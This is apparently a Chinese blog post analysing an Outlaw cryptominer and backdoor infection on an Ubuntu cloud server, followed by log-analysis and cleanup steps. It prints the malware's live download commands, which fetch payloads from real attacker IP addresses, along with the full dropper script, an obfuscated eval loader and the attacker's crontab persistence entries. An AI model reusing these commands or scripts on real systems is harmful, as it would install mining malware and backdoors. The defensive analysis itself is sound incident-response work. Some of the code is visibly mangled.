设计友好的网站,成都cms建站,建站国外百元服务器,微信公众号和小程序哪个好文章目录 一、起因与病毒分析1、起因2、阿里云告警2.1 恶意脚本代码执行12.2 恶意脚本代码执行22.3恶意脚本代码执行32.4 恶意脚本代码执行4 3、病毒简单分析3.1 病毒的初始化3.2 病毒本体执行 4、总结 二、ubuntu自救指南1、病毒清理2、如何防御 一、起因与病毒分析
1、起因 … 文章目录 一、起因与病毒分析1、起因2、阿里云告警2.1 恶意脚本代码执行12.2 恶意脚本代码执行22.3恶意脚本代码执行32.4 恶意脚本代码执行4 3、病毒简单分析3.1 病毒的初始化3.2 病毒本体执行 4、总结 二、ubuntu自救指南1、病毒清理2、如何防御 一、起因与病毒分析
1、起因
最近内网穿透服务以及自建的博客一直掉线重启服务也不行用 top 查看发现1个kswapd0进程占用了一整个核机器是2C4G遂查刚开始以为是使用swap分区与内存换页操作交换数据造成的但是清理了缓存仍无果最终发现被挖矿木马攻击了。
2、阿里云告警
登陆阿里云控制台也告警了阿里云异地登陆了云安全中心显示凭证窃取把我root密码爆破了 2.1 恶意脚本代码执行1
sh -c ./tddwrt7s.sh http://167.172.213.233/dota3.tar.gz http://5.161.227.142/dota3.tar.gz http://216.70.68.24/dota3.tar.gz http://104.131.132.54/dota3.tar.gz http://172.104.46.33/dota3.tar.gz http://37.139.10.109/dota3.tar.gz http://46.101.132.59/dota3.tar.gz .out 21 312.2 恶意脚本代码执行2
sh -c wget -q http://161.35.236.24/tddwrt7s.sh || curl -s -O -f http://161.35.236.24/tddwrt7s.sh 21 312.3恶意脚本代码执行3 2.4 恶意脚本代码执行4
/root/.configrc5/a/kswapd0 3、病毒简单分析
3.1 病毒的初始化
tddwrt7s.sh脚本内容脚本主要是下载dota3的病毒文件并运行初始化
#!/bin/bash
if [ -d /tmp/.X2y1-unix/.rsync/c ]; thencat /tmp/.X2y1-unix/.rsync/initall | bash 21exit 0
elsecd /tmprm -rf .sshrm -rf .mountfsrm -rf .X2*rm -rf .X3*rm -rf .X25-unixmkdir .X2y1-unixcd .X2y1-unixRANGE6s$RANDOMlet s % $RANGE
if [ $s 0 ]; thensleep $[ ( $RANDOM % 500 ) 15 ]scurl -O -f $1 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $1fi
if [ $s 1 ]; thensleep $[ ( $RANDOM % 500 ) 5 ]scurl -O -f $2 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $2fi
if [ $s 2 ]; thensleep $[ ( $RANDOM % 500 ) 25 ]scurl -O -f $3 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $3fi
if [ $s 3 ]; thensleep $[ ( $RANDOM % 500 ) 10 ]scurl -O -f $4 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $4fi
if [ $s 4 ]; thensleep $[ ( $RANDOM % 500 ) 30 ]scurl -O -f $5 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $5fi
if [ $s 5 ]; thensleep $[ ( $RANDOM % 500 ) 15 ]scurl -O -f $6 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $6fi
if [ $s 6 ]; thensleep $[ ( $RANDOM % 500 ) 55 ]scurl -O -f $7 || wget -w 3 -T 10 -t 2 -q --no-check-certificate $7fisleep 60star xvf dota3.tar.gzsleep 10s
# rm -rf dota3.tar.gzcd .rsynccat /tmp/.X2y1-unix/.rsync/initall | bash 21
fi
exit 0
可以发现首先是运行了/tmp/.X2y1-unix/.rsync/initall脚本打开发现进行了shell混淆最后eval命令会执行其后的参数作为Shell命令
z
;qz\{pr;Fz pw;fz tsm;Zz go;CBz{pri;Ez ~ ;XBzp -v;Yzl -9;Vztdd.;wBz ];;DCz2 | ;Azslee;qBzp 10;SBz-9 l;yBzn;UBznux;dz .o;nz-v g;izps ;Gzd);gzkill;pzawk ;jBz \{p;Dz$(cd;kBzrint;gBzgrep;ozrep|;lzun|g;cBzt $1;kzep r;nBzcat ;vzep g;VBzep x;hz -9 ;Czdir;RBzmrig;bBzprin;GBzsm|g;HBzchat;Bzp 1;LzE;CCzelse;xzep -;OBzkr -;lBz $1};Xzpkil;ABzep|a;ZBzp|aw;tz .;hBz -v ;KBz~/.c;jzx|gr;pBz | s;eBzep l;FBzep t;fBznux|;vBzgrc5;Uz.x*;Sznu.*;LBzonfi;mBz\;oBzinit;Tz.F*;uzout;ezut;aBzk \{;wzo|gr;Rzh;yzv gr;IBztr -;cz run;WBz|gre;Wzsh;rBzif [;Nzdev/;ACzexit;iBz|awk;Ozshm/;Jztmp/;BCz 0;TBzd-li;Hzrm -;bzt;MzE*;tBz$di;JBziaR ;dBz}\;PBzall ;BBzwk \;mzrep ;NBzlock;ECzfi;Qznu.s;DBznt $;az .ou;rzint ;uBzr/.c;sz$1}\;Izrf /;EBz1}\;xBz the;QBz-9 x;YBz gre;MBzgrc*;Kz.FIL;sBz -d ;Pzvar/;
eval $Az$Bz$z$Cz$Dz$Ez$Fz$Gz$z$Hz$Iz$Jz$Kz$Lz$z$Hz$Iz$Jz$Kz$Mz$z$Hz$Iz$Nz$Oz$Kz$Mz$z$Hz$Iz$Nz$Oz$Kz$Lz$z$Hz$Iz$Pz$Jz$Kz$Lz$z$Hz$Iz$Pz$Jz$Kz$Mz$z$Hz$Iz$Jz$Qz$Rz$z$Hz$Iz$Jz$Sz$z$Az$Bz$z$Hz$Iz$Nz$Oz$Qz$Rz$z$Hz$Iz$Nz$Oz$Sz$z$Hz$Iz$Jz$Tz$z$Hz$Iz$Jz$Uz$z$Hz$Iz$Jz$Vz$Wz$z$Xz$Yz$Zz$az$bz$z$Xz$Yz$cz$dz$ez$z$Xz$Yz$fz$dz$ez$z$gz$hz$iz$jz$kz$lz$mz$nz$oz$pz$qz$rz$sz$tz$uz$z$gz$hz$iz$jz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$dz$ez$z$gz$hz$iz$jz$FBz$GBz$mz$nz$oz$pz$qz$rz$sz$tz$uz$z$HBz$IBz$JBz$KBz$LBz$MBz$z$NBz$OBz$JBz$KBz$LBz$MBz$z$gz$PBz$QBz$RBz$z$gz$PBz$SBz$TBz$UBz$z$Az$Bz$z$gz$hz$iz$jz$VBz$RBz$WBz$XBz$YBz$ZBz$aBz$bBz$cBz$dBz$z$gz$hz$iz$jz$eBz$TBz$fBz$gBz$hBz$gBz$iBz$jBz$kBz$lBz$mBz$z$nBz$oBz$pBz$Rz$z$Az$qBz$z$rBz$sBz$tBz$uBz$LBz$vBz$wBz$xBz$yBz$z$ACz$BCz$z$CCz$z$nBz$oBz$DCz$Wz$z$ECz$z$ACz$BCz我们首先进行解密利用bash的调试模式即可bash -x xxx.sh注意这是追踪模式命令还是会运行这里主要就是病毒的初始化运行将一些服务暂停缓存文件进行删除。后面就是几个脚本的定时执行加入公钥修改定时任务开始挖矿
3.2 病毒本体执行
首先看了一下.ssh把我的.ssh删除了加入了它的公钥。然后看一下定时任务哦吼定时任务被修改了
crontab -l 5 6 * * 0 /root/.configrc5/a/upd/dev/null 21
reboot /root/.configrc5/a/upd/dev/null 21
5 8 * * 0 /root/.configrc5/b/sync/dev/null 21
reboot /root/.configrc5/b/sync/dev/null 21
0 0 */3 * * /tmp/.X2y1-unix/.rsync/c/aptitude/dev/null 21
从定时任务可以看出主要是两个文件目录一个是/root/.configrc5还有一个是/tmp/.X2y1-unix都是隐藏目录很狡猾注意还有一个/tmp/up.txt文件这就是被爆破的root账号密码
# /root/.configrc5目录结构病毒所在目录
├── a
│ ├── a
│ ├── bash.pid
│ ├── cert_key.pem
│ ├── cert.pem
│ ├── dir.dir
│ ├── init0
│ ├── kswapd0
│ ├── run
│ ├── stop
│ └── upd
├── b
│ ├── a
│ ├── dir.dir
│ ├── run
│ ├── stop
│ └── sync
├── cron.d
└── dir2.dir# /tmp/.X2y1-unix/.rsync目录结构
├── 1
├── a
│ ├── a
│ ├── init0
│ ├── kswapd0
│ ├── run
│ └── stop
├── b
│ ├── a
│ ├── run
│ └── stop
├── c
│ ├── aptitude
│ ├── blitz
│ ├── blitz32
│ ├── blitz64
│ ├── dir.dir
│ ├── go
│ ├── n
│ ├── run
│ ├── start
│ ├── stop
│ └── v
├── dir.dir
├── init
├── init0
├── init2
└── initall/root/.configrc/* #病毒所在目录
/root/.ssh/ #病毒公钥
/tmp/.X2y1-unix/.rsync/* #病毒运行缓存文件
/tmp/.X2y1-unix/dota3.tar.gz #病毒压缩包
/root/.configrc5/a/kswapd0 #病毒主程序然后就是a.kswapd0和c.blitiz64 两个执行程序执行程序加入了混淆加密。b.run 是一段perl脚本可以base64解密。具体的文件代码可以参考有兴趣的可以研究一下。下载地址 4、总结
Outlaw病毒通过SSH攻击访问目标系统并下载带有shell脚本、挖矿木马、后门木马的TAR压缩包文件dota3.tar.gz。解压后的文件目录可以看到根目录rsync下存放初始化脚本a目录下存放shellbot后门b目录下存放挖矿木马c目录下存放SSH攻击程序。
# 常用的日志分析技巧
# 定位有多少IP在爆破主机的root帐号
grep Failed password for root /var/log/auth.log | awk {print $11} | sort | uniq -c | sort -nr | more
# 定位有哪些IP在爆破
grep Failed password /var/log/auth.log|grep -E -o (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|uniq -c
# 爆破用户名字典是什么
grep Failed password /var/log/auth.log|perl -e while($_){ /for(.*?) from/; print $1\n;}|uniq -c|sort -nr# 登录成功的IP有哪些
grep Accepted /var/log/auth.log | awk {print $11} | sort | uniq -c | sort -nr | more
# 登录成功的日期、用户名、IP
grep Accepted /var/log/auth.log | awk {print $1,$2,$3,$9,$11} 二、ubuntu自救指南
1、病毒清理
1、top kill -9 首先停止可疑进程
2、清理定时任务crontab -e
3、删除相关后门ssh key内容vim /root/.ssh/authorized_keys
4、删除/tmp目录下缓存文件不同病毒可能不一样rm -rf .X2y1-unix/
5、删除病毒目录和文件rm -rf /root/.configrc5
6、其他暂时没发现后门不过我发现病毒给的停止删除命令挺好使的
2、如何防御
1、修改我们的账号密码加强复杂度不要使用口令
2、公有云添加白名单策略业务端口只允许公司出口IP访问 https://blog.csdn.net/subfate/article/details/106546646
https://www.cnblogs.com/autopwn/p/17355657.html
